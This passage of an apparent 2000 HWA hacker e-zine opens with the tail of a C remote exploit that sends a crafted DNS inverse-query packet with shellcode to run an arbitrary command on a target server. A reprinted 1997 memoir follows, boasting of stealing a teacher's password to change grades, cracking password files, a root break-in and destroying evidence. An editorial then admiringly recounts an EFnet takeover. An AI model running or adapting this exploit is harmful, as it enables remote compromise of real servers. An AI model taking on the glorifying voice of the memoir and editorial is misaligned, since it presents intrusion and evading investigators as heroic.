      #include <unistd.h>
      #include <arpa/nameser.h>
      
      typedef struct {
              unsigned short int      r_class;                /* class number */
              unsigned short int      r_type;                 /* type number */
              unsigned long int       r_ttl;                  /* time to live */
              unsigned short int      r_size;                 /* size of data area */
              char    r_data[QUERY_LEN];                      /* pointer to data */
      } rrecord;
      
      char shellc[] = "\xEB\x4b\x5E\x33\xD2\x33\xC9\x33\xDB\x66\x8B\x04\x0E\x02"
      "\xC4\x88\x04\x16\x41\x41\x42\x22\xC0\x75\xF0\x02\xE4\x74\x0E\x8D\x04\x16"
      "\x89\x04\x1E\x43\x43\x43\x43\xEB\xE0\x90\x90\x33\xC0\x89\x04\x1E\x46\x88"
      "\x46\x0E\x46\x46\x46\x89\x46\x06\xB0\x3B\x8D\x4E\x10\x8B\x5E\x10\x8B\xD1"
      "\x8D\x76\x05\x52\x51\x53\x50\xFF\xE6\xE8\xB0\xFF\xFF\xFF\x6f\x21\x6f\x21"
      "\x6f\x21\xdf\x21\x6f\x21\x6f\x21\x6f\x21\xdf\x21\xdf\x21\x8B\x0F\x8B\x0F"
      "\x8B\x0F\xdf\x21\x8B\x0F\x02\x05\x8B\x0F\x6f\x21\x6f\x21\x6f\x21\xdf\x21";
      char neshel1[] = "\x11\x11\x11\x11\x11\x11\x11\x11"; /* shellcode by   */
      char neshel2[] = "\x22\x22\x22\x22\x22\x22\xdf\x21"; /* stran9er 10'97 */
      
      main(int argc, char **argv) {
         HEADER *h;
         rrecord *rr;
         char db[sizeof(HEADER)+sizeof(rrecord)+2];
         char *buf, *ptr;
         unsigned char cat[]="no";
         short int *buflen;
         unsigned long stack = 0xefbfd444, offset;
         int sh=1024,o,b,c,t;
      
         if ( (argc<3) || (*argv[2]!='/')) {
           printf ("usage %s offset /path/command [args ...] | netcat target 53\n",argv[0]);
           exit(1);
         }
         offset=atoi(argv[1]);
         stack+=offset;
         fprintf(stderr,"\nAdress: 0x%x Offset: %d\n",stack, offset);
         buf=db;
         memset(buf, 0, sizeof(db));
         buflen=(short int *)buf;
         *buflen=htons(sizeof(db)-2);
         h = (HEADER *)(buf+2);
         h->id = rand() & 0xfff;
         h->opcode = IQUERY;
         h->ancount = htons(1);
         rr=(rrecord *)((char *)h+sizeof(HEADER)+1);
         rr->r_class= htons(C_IN);
         rr->r_type = htons(T_A);
         rr->r_ttl  = htonl(31337);
         rr->r_size = htons(QUERY_LEN+1);
         ptr=rr->r_data+1;
         memset(ptr,0x90,QUERY_LEN);
         ptr[498]=0xeb; ptr[498+1]=21; /* damn: sprintf(dnbuf, "[%s]", inet_ntoa(data_inaddr((u_char *)data))); */
         for(c=sh;c<=(QUERY_LEN-4);) {
            if ((c+4) > (QUERY_LEN-4)) stack +=4;
            ptr[c++] =  stack & 0x000000ff;
            ptr[c++] = (stack & 0x0000ff00) >> 8;
            ptr[c++] = (stack & 0x00ff0000) >> 16;
            ptr[c++] = (stack & 0xff000000) >> 24;
         }
         strcpy(ptr+sh,shellc);
         for (b=2;b<argc;b++) strcat(ptr,neshel1);
                              strcat(ptr,neshel2);
         for (b=2;b<argc;b++) {
          for (c=0;c<strlen(argv[b]);c++) {
           cat[0]=argv[b][c]-'Z';
           cat[1]='Z';
           if (!cat[0]) break;
           for (t=0,o=-1;t!=o;) {
              o=t;
              if ((cat[0]!=0) && (cat[0]<=32)) { cat[0]++; cat[1]--; t++; }
              if (cat[1]<=32) { cat[0]++; cat[1]--; t++; }
              if   (!cat[0]) {fprintf (stderr,"can't encode command line\n") ; exit(1);}
           }
           strcat(ptr,(char *)cat);
          }
          if ( b != (argc - 1) ) strcat (ptr,"\xf0\x10"); 
         }
        strcat(ptr,"\x80\x80");
        ptr[strlen(ptr)]=9;
      
        write(1,buf,sizeof(db));
      }
      /* DONT FUKIN DIST 0- THAT MEANS YOU DARKN3T SCRIPTK1DS */
      
      @HWA


336.0 [HWA] Darknet.hwa-security.net Mirror opens
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://darknet.hwa-security.net/
      
      Due to lots of hassles with gov-boi's site and his personal problems and dosings
      and legal entanglements and predicaments and fuckups we decided to host a mirror
      on our site. It's up now.
      
      http://darknet.hwa-security.net/
      
      note: if that's broken due to DNS issues this godawful link below will work
      
      http://hwa-security.net/darknet.hwa-security.net/darknet2
      
      Posts will be updated as often as i can, do not bug us if the updates do not come
      regularly, his site is often down and the files are not available. Plus we have
      heavy work loads ourselves.
        
      
      @HWA
      

337.0 [IND] from the didn't they die? files: genocide2600.com oldskewl revisited
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      Genocide2600.com: ex-hosts of packetstorm and spikeman's dos site. Both these
      sites were pulled due to some differences or other and packetstorm was relocated
      to a .edu site. For those that followed the story it was a nasty time; the rest
      of you will just recall securify acquiring and hosting packetstorm and Ken retiring
      from hosting the site. This is all very old news, anyway...

      Genocide2600 servers originally hosted packetstorm back when Ken Williams had
      control over it. Strangely, they seem to again have at least a packetstorm
      mirror up on their servers (or is that just aliased?). Anyway, i found this while
      flipping through referrer tags and don't recall ever having printed the Gen2600
      history file, which is quite interesting, so here it is:
            
      
      From davidsol@panix.com Mon Apr 28 15:22:14 1997
      Date: Mon, 21 Apr 1997 14:08:27 -0500
      From: "David S. Bennahum" 
      To: -=* WiZDoM *=- 
      Subject: MEME 3.02
      
      WiZDoM, FYI this is what the current issue of MEME looks like.  I am going 
      to hold sending it to the end of the day, around 4:30 EST, so you can send 
      me any comments, if you have them, otherwise I'll assume this is good to 
      go...
      
      Again, many thanx.
      
      best,
      db
      [...here is the issue as it will look...]
      
      
      -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
      meme: (pron. 'meem') A contagious idea that replicates  like a virus, 
      passed on from mind to mind. Memes function the same way genes and 
      viruses do, propagating through communication networks and face-to-face 
      contact between people.  Root of the word "memetics," a field of study 
      which postulates that the meme is the basic unit of cultural evolution. 
      Examples of memes include melodies, icons, fashion statements and phrases.
      -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
      
      
      MEME 3.02                                       
      http://memex.org/meme3-02.html
      
      
      
      "I was in after school doing make up work in my chem class as usual when I 
      noticed one day my teacher, Miss Ricker, entering grades through  an Apple 
      network using a fairly simple grade program.  She wasn't very  security 
      minded and I used that as a window.  Through a little use of  "Social 
      Engineering" I quick thought something up to ask her and walked  up and 
      started asking her info right when she was entering her login and  
      password into the mac.  I was looking down into my notebook and  pretended 
      to write stuff as I asked her, what I really did was write  down her login 
      and password."
      
              --The cybernetic education of a Hacker, in MEME 3.02
      
      "Hackers."  The word means something different, depending on whom you ask. 
       People at CERT, the Computer Emergency Response Team at Carnegie Mellon 
      University in Pittsburgh (http://www.cert.org/), might say, "a hacker is 
      someone who breaks into computers."  My great-aunt, who recently turned 
      91, associates hackers with people who drive taxis, from the days when a 
      "hack" meant an unpleasant, or distasteful job.  Richard Stallman, founder 
      of the Free Software Foundation, who was interviewed in MEME 2.04 
      (http://memex.org/meme2-04.html),
      calls himself a hacker. To him "hacking" means  developing software in an
      open, collaborative environment, with a strong ethical sense of right and
      wrong.  The New Hacker's Dictionary defines hacker as "someone who enjoys
      exploring the details of programmable systems and how to stretch their
      capabilities, as opposed to most users, who prefer to learn only the
      minimum necessary."  
      (http://murrow.journalism.wisc.edu/jargon/jargon_22.html#TAG831) Hacking,
       hackers, hack-- whatever the form, these words are the Rorschach 
      test of cyberspace: what you think hacker means says as much about you as 
      it does about hackers.  Are hackers good?  Are hackers bad?  It all 
      depends on what definition of hacking you have.
      
      In this issue of MEME, I send you one of the rare, lucid examples of a 
      hacker-memoir from the breaking-into-computers variety of hacker.  The 
      story is written by someone whose nom-de-hack is "Genocide," and is a 
      founder of Genocide2600, a hacker-clan based in Alaska and the Northwest 
      of the United States.  The piece came my way via another hacker, named 
      WiZDoM.  He could well be the same person as Genocide, or not.  That's 
      part of this game-- uncertainty.  
      
      With hackers you can't be sure what's true, and what's not.  Nor does it 
      really matter.  Hacker-tales are meant to be heroic.  They are yarns, and 
      this one's one of the best I've received in a long, long time.  I think 
      you'll enjoy it as well.  A brief cautionary note: those readers who take 
      umbrage at "curse words" should be forewarned, Genocide likes to use them. 
       Spelling is left as received.
      
      I make no moral judgment about this essay, other than to say breaking into 
      computers is bad, and you shouldn't do it.  You, however, may want to 
      discuss the issues raised by Genocide's essay, and you're invited to do so 
      in the MEME discussion area, on Electric Minds:
      
      http://www.minds.com/cgi-bin/EMPane.cgi?c=21&f=0&i=1&t=9
      
      --dsb
      
      
      Date: Fri, 18 Apr 1997 16:42:43 -0800 (AKDT)
      From: -=* WiZDoM *=- 
      To: The_World@universe.com
      Cc: gen2600@aracnet.com
      Subject: Thought you may want to read.
      
      
      
                              The Genocide2600 Group History
      
                              Writtin by Genocide                     4/1/97
      
      
      
              http://www.aracnet.com/~gen2600
              http://www.Genocide2600.com
      
      
      
              /* Some of the contents of this document may be fictional.  I 
              leave the reader to themselves to figure out what is true and not 
              true and what you will believe.  Since it covers possibly illegal 
              topics and events, I will not swear that any of the following 
              content is true in any way.  All events herein may or may not 
              have happened, for obvious reasons I must leave it up to the 
              reader to choose whether or not anything the read contains even 
              a grain of truth.  As for the members, we all know what really 
              happened. */
      
      ---
      A:      Intro
      
      1.      What a hacker is.  What a hack is.
      2.      Who we are.
      3.      The Genocide2600 Manifesto
      4.      How it started.
      ---
      
              A:      Intro
      
      Well, people have been asking me for about a three years or so, how did
      you start the Genocide2600 group...how did you get into hacking, how, how, 
      how, how...etc...Well, I'm going to make a damn good effort to "tell 
      all".  Right now it's April 1st, April Fools day of 1997, I've been a 
      h/p/v/a/c'er for over 8 years now.
      
      Today the Genocide2600 group is over 150people strong and we occupy 
      Alaska, Washington, Oregon and are now expanding into the East coast area.
      
      We have made many friends in our business/field and have tought many 
      people.  
      
              Shout outs go out to:
      
              -Silicon Toad, Bishop, MODul8r, Jester, Tim Wilde, Xer0 Tolerance.
      
      ---
      1.
      
      First let me start by defining what I consider a hack, or a hacker.  
      
      A "Hack":= 
              The act of doing an action when there is no known way to do it.
              The act of doing something that can't be done.
              The act of doing something that is totally against the odds.
      
      A "Hacker":=
              Someone who can overcome, against the odds.
              Someone who can figure a way out of a game that can't be won.
              Someone who teaches others and spreads knowledge when no one 
              wants to hear it.
              Someone who doesn't quit.       
              Those who rise in the face of thier advesaries when they are 
              grossely outnumbered.
      
        You don't have to know how to "Crack a password file to be a hacker"
      
       "Use what you have got, and you will not need what you have not..."
       -Quote from "Around the world in 80 days"      
      
      ---
      2.
      Who we are.
      
              Let me describe what we are and what we do.
      
              We are simply a group of talented people.  Nothing more nothing 
      less.  A group of people from all walks of life, from 14years old to 
      52years old.  Some of the group don't even know what a password file is, 
      hell some of them don't even know how to turn on a computer.  But the 
      point is, everyone specializes in something and they offer thier 
      services to the rest of the group.  We even have lawyers that assist 
      us...should the need arise.  Everyone helps everyone else in whatever 
      they do, however they can offer thier expertise in thier chosen field.  
      Most of the group was chosen by my hand, but now our numbers have grown 
      so large, I have appointed "heads" that manage areas, ie: one head per 
      Alaska, Washington and now the East coast.  Most of our members choose to 
      stay behind the viel, in other words they don't choose to be public thus 
      they are protected and they speak to those of us who are in the open. 
      There are a handfull of us that do choose to be public:
      
              -DoXaVG, BernZ, Astroboy, WiZDoM, Alexu, OvErLoRD and me - Genocide
      
              Some members of the group are long married and have kids, some 
      are single, the point is, we could be your neighbor or your babysitter for 
      all you know.  We could be the kid filling your gas in your car, it 
      doesn't matter, all you really need to know is we are spreading, as fast 
      as knowledge, faster then light, the speed of information.  
      
      The Social Base of the Hacker:
      The Genocide2600 Manifesto.
      
              People generally believe that hackers have a milicious intent as 
      a general rule.  This, pardon my language is a crock of shit and 
      obviously the idea/ramblings of the most generally uninformed people on
      the net, I do admit that "YES" there are those that are out to only
      destroy, and yes this group does occasionally add to that at a very small
      percentage (this will be explained later), but for the most part, we are
      in the persuit of knowledge.  I do not claim to be a 100% law abiding
      person, nor does the group, obviously if you have heard of us, or even
      after reading this you will be shaking your head at this point.
      
              As a whole that we believe in a collective good, we believe that
      people who try to shut out other are people so others can't listen to them
      or people who try to censor our actions/language/activities are the people
      who deserve none of the above.  We cling to our most basic civil rights.
      We also believe in retrobution for what is lost.  
      
              Eye for an eye mentality is spoken here, take back what is yours.  
      
              Bottom line is this, don't fuck with us, we do fuck back.
      
              Trying to turn peoples minds away from truth or trying to hide
      whats REALLY going on is something that is not tollerable no matter
      what and that therein is the true crime, not trying to rip the viel from
      the sheeps eyes.  We're here to show you.  We aren't the criminals that
      need to be put away.  We are the ones you should praise.
      
              People for all time have feared what they did not
      understand...what they did not know.  You don't know us...you don't
      understand us.
      
              Some have labeled us as terrorists, others as criminals.  Ok.
      Sure.  Whatever.  Go ahead take the criminals and terrorists away that
      fight for your rights.  After you have lost the battle because your
      soldiers are gone at your own hand, you'll have no one to blame but
      yourself.
      
              We fight with the greatest tools of all, our intellect and
              courage.
      
      ---
      3.
      How it all started.
      
              I started when I was 14, I had never heard of hacking, phreaking 
      or any of the lot.  People really didn't pay much attention to me and 
      that suited me just fine.  I was able to be more an observer then the 
      person who screwed up and got nailed for something, I would shake my head 
      and learn from how they fell.
      
              I guess I was what you would call now a phreaker then...I heard 
      that funny sound when you put coins into the pay phones... found it 
      curious and I bought a hand recorder for $20.00 and went to town, I 
      called places I didn't even know about, because I could.  Me and my close 
      personal friends dabbled in Blue Boxing once we discovered BBS' on our
      brand new 1200baud modems.  I learned telephony from my cousin, the 
      resident criminal in our town.  As I look back now, the first phreaker I 
      ever knew was my cousin.  He tought me the magic of Ma' Bell and how it
      could be turned on her.  I understood true telephony and hadn't even seen 
      a computer.  I had met my first hacker.
      
              My phreaking died with the end of the blue box.  I gave up on it 
      when those friends whome I surrounded myself with began to be picked off 
      one by one by the local law.  I decided to survive I had to adapt, I knew 
      what I was doing was generally thought of as criminal.  But I finally 
      found a knowledge that made my mind hunger, made me stay up night after 
      night.  I wanted to learn for the first time in my life.
      
              Although this hunger didn't lead me in the ways of most law 
      abiding talented computer learners, it did teach me how to make it and 
      not loose no matter what pieces of the art of survival.  
      
              I was in after school doing make up work in my chem class as 
      usuall when I noticed one day my teacher, Miss Ricker, entering grades 
      through an Apple network using a fairly simple grade program.  She wasn't 
      very security minded and I used that as a window.  Through a little use of 
      "Social Engineering" I quick thought something up to ask her and walked 
      up and started asking her info right when she was entering her login and 
      password into the mac.  I was looking down into my notebook and 
      pretended to write stuff as I asked her, what I really did was write 
      down her login and password.
              
              If I failed Chemistry, I wouldn't be able to graduate highschool 
      because it was a required class.
      
              Later that day I had a speech class that I did the grades for on 
      the same network on a similar mac.  I came in 10minutes early, just like 
      normal and no one was in there.  I entered her name and password into the 
      computer and accessed the class grades via her saved information in her 
      personal directory on a restricted network hard drive.  I found my name 
      and double clicked on it, there was all my work info, I added extra 
      credit wherever I could.  On a test, I moved it from 63% to a 73%, it was 
      just enough to boost my grade into the low "D" area.  I graduated almost 
      a year later.  Right on time.
      
              My mother was going back to school to get her degree at the local 
      college in Fairbanks Alaska when I really discovered computers.  I used 
      her access (which, yes I got from a yellow sticky) to the local VAX to 
      wet my lips with the taste of the computer age.  I explored and learned for 
      about two to three years there in that simple student VAX lab, then they 
      went to OSF/1 or Digital UNIX as most know it and something happened. 
      
      This was a chance at a virgin system, the system administrator didn't 
      know exactly how to use/manage a actual UNIX system vs. a VAX system. 
      
      Before he had a chance to secure the server to any reasonable 
      level, I had already discovered the unshadowed /etc/passwd file and in a 
      matter of hours had also discovered my first version of crack.  My first 
      successfull run of my now compiled crack was nearly my last.  I was not 
      aware of the system requirements that crack used at that time.  It was a 
      rather extensive resource hog and after I had set crack to run I put it 
      in the background and hit "w" to see what everyone was doing.  The lab 
      was full.  I had about 40 more seconds before it would finally be done 
      with the passwd file when I hit "w" the last time.  I noticed the system 
      admin doing a "w fstbo" I knew what was happening.  He saw I was using 
      crack on the passwd file and he also knew I was only around the corner by 
      looking at my terminal number.  I freaked, foregrounded the processes,
      killed it and ran.
      
              I only looked back after I had completely left the building, 
      there in the computer lab was the system admin talking to a student at my 
      terminal.  My luck those computers were in such high demand.
      
              I loved that taste of adrenaline.  It was also in that room where 
      I would meet Alexu, WiZDoM and Astroboy.  The first members of the 
      Genocide2600 group, they didn't even know it yet, niether did I.
      
              The following year yielded many systems, mostly criminally 
      broken into, but none were damaged other than our initial breakins.  I 
      guess we were also lucky that Fairbanks Alaska was a great region to 
      begin such a spree.  Two military bases, one Army and one Air Force were 
      only a half hour in each direction, three high schools and a huge college 
      with multiple Cray computers.
      
              Contests between us all, then about up to 10, began and we 
      realized we had formed an actual group.  We wrote virii in assembly that 
      would take each other out on the system while eating resources eventually 
      crashing the computer.  If you won, it was your virii left standing.  
      
              One of the guys in the group "Malcom" had knowledge of a 2600 
      magazine and brought up the idea of actually holding a 2600 group meeting 
      on Fridays at 7pm like in the mag.  We all agreed and took turns teaching 
      whomever would care to listen about computer security, telephony, media, 
      cryptography, government whatever was our specialty.  This was my first 
      year of College.  I was a freshman.
      
              We actually were recognized as an educational group by the 
      University at that point and were encouraged to hold group meetings and 
      given areas where we could meet.
      
              The group continued on like that for about two years.  Usually after 
      the 2600 meetings we would either find a secluded computer room or go  
      over to one of the members houses and "try out" our newfound info, or 
      trick, we scoured documented holes in unix operating systems looking for 
      other holes that may have been similar.
      
              One Friday we held the proceedings at my house and planned a 
      breakin.  I had a Pent75 with 16megs of ram (badass at that point in time) 
      with a 1.275 gig hard drive.  The fastest computer of the group.  As 
      standard procedure we would dialup from an anonymous number in the 
      "Great Hall" of the University onto "PolarNet" under a hacked PPP 
      account.  After connect we proceeded to telnet to a student account at 
      the local school network where we had already gotten root access.  We 
      would do anything we really had to do from there usually, but sometimes 
      we were lazy and would telnet straight out of "PolarNet" or "AlaskaNet".  
      
           That night we snooped a commercial server which we will call "moon" 
      and found we could gain root access remotely.  We got root access after 
      approximately 1 hour of scanning the target system.  We however did not 
      know that this was one of the foremost computer security systems in the 
      U.S.  We gained root access at approximately 11pm.  Upon entry it 
      looked like a simple corporate computer, perhaps only a webhosting 
      machine.  Upon closer inspection we noticed that it was a server designed 
      for information storage that is used by system administrators to crack 
      into systems in order to secure them.  This server also had programs used 
      to crack systems, so we took them all.  We took the programs and the info 
      they had within the system.  It was a total of about 14megs of it, we 
      downloaded it to the local system which was through a T1 so it didn't 
      take long, we broke connection to "moon" and proceeded to download the 
      info from the local server to our computer.  Where we passed the info to 
      each other.  
      
              From then on we couldn't access that "PolarNet" account.
      
              We proceeded to share our new found info with the group members 
      that Friday night and brought disks full of info to give away at the 
      price of the disks themselves, the information was spreading.
      
              I had the Genocide2600 webpage up for almost a year at this 
      point, and the attack on "moon" had yielded some incredible info, so the 
      page grew amazingly fast.  As did the requests for its removal by the 
      system administration of the school.
      
              At this time the page was then mentioned by several German 
      underground magazines at the address:
      
              http://icecube.acf-lab.alaska.edu/~fstbo
      
              With email going to:
      
              fstbo@aurora.alaska.edu
      
              The next Friday I received an official warning at my school's 
      account to "please remove your page from the system" well...I changed it 
      a little and hid it a little deeper on my account, and the requests 
      stopped for a little while.
      
              Also that next Friday we had a visitor at the meeting.  This was 
      not uncommon because us being a University group, anyone could come in 
      and sit in.  At times like these we would obviously speak of nothing 
      illegal.  This was, however, different from the rest of the "visits" by 
      faculty and staff, this was a man in a navy blue suit.
      
              After the meeting was over and everyone was leaving he came up to 
      me and asked if we could talk, I agreed, and we walked.  He informed me 
      he was here to prove that I had broken into "moon" and that he would be 
      heading up the investigation.  He also informed me that they suspected me 
      because of my page, my affiliation of the group etc...
      
              I was honestly scared.  I called my mother and told her I had 
      been approached by the FBI and that there was a possibility that I may be 
      put away as a result.  She asked me if I did what they were accusing and I 
      told her no.  Which turned out to be a damn good idea, because she spent 
      over two hours speaking to them.
      
              They froze my account to view the contents and review what I had 
      on the system.  They were looking for info that would point to me as the 
      person who broke into the system, they found plenty.  The one thing that 
      saved my neck was that they couldn't tie me to the broken account on 
      "PolarNet" they could prove that the call came from the University but 
      not where.  They could prove that I had info that was regarded as secret 
      but they couldn't prove where I had gotten it.  I told them I got it off 
      the internet.
      
              After the entire thing was done and over with, it had taken up 
      around 3 weeks and a lot of missed classes on my part.  My account was 
      unfrozen right in time for them to barrage me with numerous requests to 
      move the page off of the server again.  I buried it deeper into my 
      account and the requests subsided again.
      
              After the FBI left, the group wasn't quite the same, around half 
      the "not so into it" members left, probably out of fear for their school 
      status.  The school slammed the door on the school 2600 group on campus.  
      
              The remaining members and I formed the formal Genocide2600 group 
      we didn't meet in any publicly known places or in scheduled places 
      after that.  We would just get together and decide where to go on the 
      fly.  The 2600 group dropped from sight and the Genocide2600 group went 
      under veil, away from view after the papers stopped publishing stories 
      about some loose internet terrorist at the University.
      
              A couple months later, I got a job at a local internet service 
      provider, I had a lot more time on my hands to surf the web and check out 
      areas that I didn't know about and discovered news groups I was looking 
      through the usual alt.2600, alt.warez etc... and noticed people peddling 
      serial codes and numbers for software, this intrigued me and I added the 
      "service" to my webpage.  The Genocide2600 group's page was the basic 
      hub for serial numbers at that time and that is probably what 
      really put us on the map.  
      
              We made friends of other net going hackers by trading info, 
      programs and knowledge.  The big web areas on the net were: SiliconToad, 
      Materva, CandyMan and us, the Genocide2600 group.  CandyMan disappeared 
      and we have been asked by certain parties to not really say anything 
      regarding his silence.  Materva is currently out of the scene and 
      revamping his pages.  This left SiliconToad and our group of the 
      original few on the web, pre the movie "Hackers" and the influx of 
      everyone and their dog wanting to be 3l33t3, er rather elite, sorry.
      
              I had plenty of free time while waiting for people to call at the 
      ISP I worked at (ImagiNet) I discovered a strong regard to the freedom of 
      speech, after all, it was what was keeping me from going to jail.
      
              Now there are those that abuse the theory of freedom of speech, 
      some say it's us, the hacker, but what I am referring to are the child 
      pornography dealers on the net.  I know it has been deemed illegal now, 
      but it still goes on.  We were kicking the shit out of these people on 
      AOL (the primary front) we would get onto AOL with our AOHell programs 
      and start scanning the chat rooms, when we found someone whom we 
      suspected or who was talking about it, we would flood them with email 
      and kick them off, causing them to actually have their connection break 
      have to logon and have to deal with a paralyzed mailbox and as soon as we 
      would see them, WHAM again, they would be gone again.  Sure we'd get   
      caught and kicked off but that was half the fun, we were back on within 
      10minutes.  What I always thought was entertaining were the agents AOL 
      hired to look for hackers, they would be in the SAME room as us and the 
      child porno runners and we'd attack the porno runner, who would the 
      agent go after?  Us.  They would let the porno runner go 90% of the time 
      without even a warning.  Sure we were breaking the law too, but we do 
      have some ethics. >;)
      
              Enter BernZ, a young prospective hacker who wrote to me on one 
      of my last days in Fairbanks, and asked me to help him learn the trade.  
      Now, I get around 500 emails a week, from non-member sources and half of 
      them are asking me the same thing.  But something was different this 
      time.  He had a style that I liked.  He defined what it was he could do, 
      I told him this was called "Social Engineering" or standard old 
      manipulation.  I could hear him grin over the email.  He asked to join 
      the group after a couple of weeks of correspondence and I finally asked 
      him where he was.  East coast.  The group was primarily a west coast 
      operation.  East coast was a good idea though, both coastal areas were 
      the biggest expanding computer related areas on the map.  So we decided 
      that yes he should indeed head up the East Coast movement.
      
              And so he did and is.
      
              My job moved to Portland, Oregon, so I followed.  I needed a 
      webserver so I moved it to its current home:
      
              http://www.aracnet.com/~gen2600
      
              This is where our hits really began to grow.  Also our 
      international image.  Magazines started printing our address as a 
      controversial/underground webpage.  We started turning heads.  Somewhere 
      along the line someone out there (Cheyenne Software) noticed that we 
      carried serial numbers on our page and the real flame storm started that 
      day.  My account was frozen instantly.  They froze the account to 
      review what was really on the page and see if there was really any 
      serial numbers, which all of you know is bigtime bad.  I was facing 
      around 2,000 counts of software piracy.  The Oregon chapter of the 
      Genocide2600 group got together that night and cracked the server, 
      moving any evidence of the serial numbers off of the system.  We got 
      away again.
      
              Almost 3 days later I was at work at about 10am when my pager 
      went off and told me to call home for messages, I did.  Found a message 
      from someone only identifying themselves as "Mr. Jerkins" and that I 
      should give him a call.  I did, he said that he wanted to meet with me at 
      my Gladstone Oregon home and that they would like to bring me somewhere 
      to talk.  I freaked, I don't care what anyone says, if they say that the 
      hair on the back of their necks doesn't stand on end when they get a call 
      from the FBI, they are lying.
      
              I called an emergency meeting at my house of the Genocide2600 
      members from Oregon for later that night.  We probably wore that 
      recording out listening to it, trying to find out if it was indeed a 
      joke.  We finally decided, no it wasn't a joke.  So I called him back and 
      set up a time.  
      
              They were five minutes early.  Mr. Jerkins was with 4 other men 
      dressed in suits, all smiling.  They wanted to take me to some place I 
      didn't recognize, which is no shock seeing I only had lived there 3 
      months.  But I wasn't going to chance it.  I told them I wanted to go to 
      Burgerville down the street at GlennEcho street.  Hey, I know it sounds 
      corny, but if you have ever seen "Mulholland Falls" you would understand.
      
              We packed into a late model Ford Royal Crown Victoria and headed 
      to the burgerhouse.  My leg was uncomfortable because of the Gerber 
      MarkII boot knife pushing into my ankle and my right hand was on my switch 
      blade the entire time.
      
              They didn't say a word while we got out of the car.  We walked 
      into Burgerville and everyone behind the counter followed us with their 
      eyes and heads.  We had to look out of the norm, 4 suited guys all under 
      6 foot and me, black leather jacket and jeans, and a black "Skellum" 
      shirt that says, "Un-natural disaster, can you feel hells laughter?" 
      and six foot tall.  We sat, I ate and we talked for almost one hour.
      
              Only two of the four talked.  Mr. Jerkins and someone else whose
      name I can't remember.  As soon as they opened their mouths, I began 
      to sweat.
      
              It seems I was dropped off at home as rapidly as they had picked 
      me up.  I sat there at my computer, my hands shaking, dialed up and 
      jumped into my email program, pine.  I wrote all members of the 
      Genocide2600 group, in Alaska, Washington and Oregon and informed them, I 
      had just been offered a job.
      
      That was only a couple of months ago now and I sit here at midnight 
      typing away and not even wanting sleep anymore.  In two weeks the 
      Genocide2600 server goes up, the new dawn.
      
                      http://www.Genocide2600.com
      
              -Genocide
               Head of the Genocide2600 Group
      
                              *Embrace Freedom*
      
                             gen2600@aracnet.com
      [EOF]
      
      @HWA      

 338.0 [HWA] Nov 2000: The day efnet nearly died, The ShadowKnight and Mafiaboy crusade
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Pseudo editorial by Cruciphux
      
       
      EFnet was owned. yes it was. it didn't happen quite the way it was planned
      but it was a classy hack nonetheless. Over 20 oper account shells were 
      compromised and services.us was owned. EFnet was at these hackers' mercy
      the charge? ALL CHANNELS OPLESS! ALL CHANNELS MODELESS!! ALL TOPICS TO
      PROCLAIM FREE MAFIABOY! FREE SHADOWKNIGHT! ... well it took most of the
      night and only 300 or so channels were taken but services.us was indeed
      owned and this hack had irc opers all across the globe SQUITting their
      servers like crazy trying to regain ops and channel control. Massive dosing
      taking place during the hack contributed to its essential "failure" and to
      this date EFnet has not recovered, a massive state of channel desynch 
      effectively fscked up efnet operations for a good week or more and some channels
      are still not back in the hands of their 'rightful owners' as most people
      know on EFnet it is like the great wild west, or frontier, you fight for your
      nick, your channels, you are packetted for dissension and general anarchy
      and chaos is the order of the day.
            
      This is not a one off event I was privy to this deed (I had 30 mins 
      warning) and can say that it is truly a hack worthy of some regard. A 
      Mass hack like this has not been seen in some time, also recently
      (Nov 13th) spaceport.jpl.nasa.gov and other nasa boxes were compromised
      resulting in several gloatfests and people ircing as ShadowKnght from the
      compromised box (allegedly a wingate(!)) it is at the time of this writing
      still unsecured and being exploited. I am told by purps of the original 
      hack that there will be a reprise and this time they are aiming for total
      EFnet control, I think they have a good chance of pulling it off. 
      
      Unfortunately this is not without some fallout, it is rumoured that HWA is
      under FBI investigation (#hwa-security was one of the channels that was 
      left with ops, and we have irc opers in our wings) so there are a lot of
      EFNet denizens that are looking for revenge or at least to save face, not
      to mention the implications such a premeditated, contrived mass hack has on
      presumably even national security, After all this is back bone ownage for
      all intents and purposes. Anyway the true fallout is yet to be seen HWA does
      not condone this action nor has any hand in its undertaking the people behind
      it just wanted us to cover the 'action'. Logs of the 'takeovers' are at the
      end of this story, here's some press regarding mafiaboy and shadowknight to
      set the scene.
       
      Some history:      

  
      http://dailynews.yahoo.com/h/nm/20001107/wr/crime_hacker_dc_1.html
      
      Tuesday November 7 5:38 PM ET
      Calif. Man Who Hacked NASA Computers Pleads Guilty 

      By Dan Whitcomb

      LOS ANGELES (Reuters) - A 20-year-old man who hacked into scores of U.S. 
      government, NASA and university computers under the names ``Shadow 
      Knight'' and ``Dark Lord'' has pleaded guilty to federal charges at a 
      closed-door hearing, prosecutors said on Tuesday.

      Jason Allen Diekman, who faces a maximum of 16 years in prison, entered his plea 
      to U.S. District Judge Dean Pregerson on Monday, said Thom Mrozek, a spokesman 
      for the U.S. Attorney's Office in Los Angeles.
      
      Mrozek said the public was barred from the plea hearing for reasons that 
      prosecutors would not disclose. Diekman, a resident of Mission Viejo, 

                                    


339.0 [IND] Arab Hackers Hit U.S. Firm for Israeli Ties
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Source: http://www.abcnews.go.com/sections/world/DailyNews/mideast001106_cyberwar.html
      
      B E I R U T, Lebanon, Nov. 7
      As Israelis and Palestinians exchange
      bullets and stones in the West Bank and
      Gaza, other partisans are waging a
      fierce war on the Internet - and drawing
      in the United States.
      
      
      On Thursday and Friday, Arab hackers attacked the Web site of U.S. company, Lucent
      Technologies, a company that does extensive high-tech business with Israel. The attack
      came just days after the F.B.I. in Washington warned the three-week old Arab-Israeli
      cyberwar could spill over into the United States. Beirut's Daily Star newspaper reported
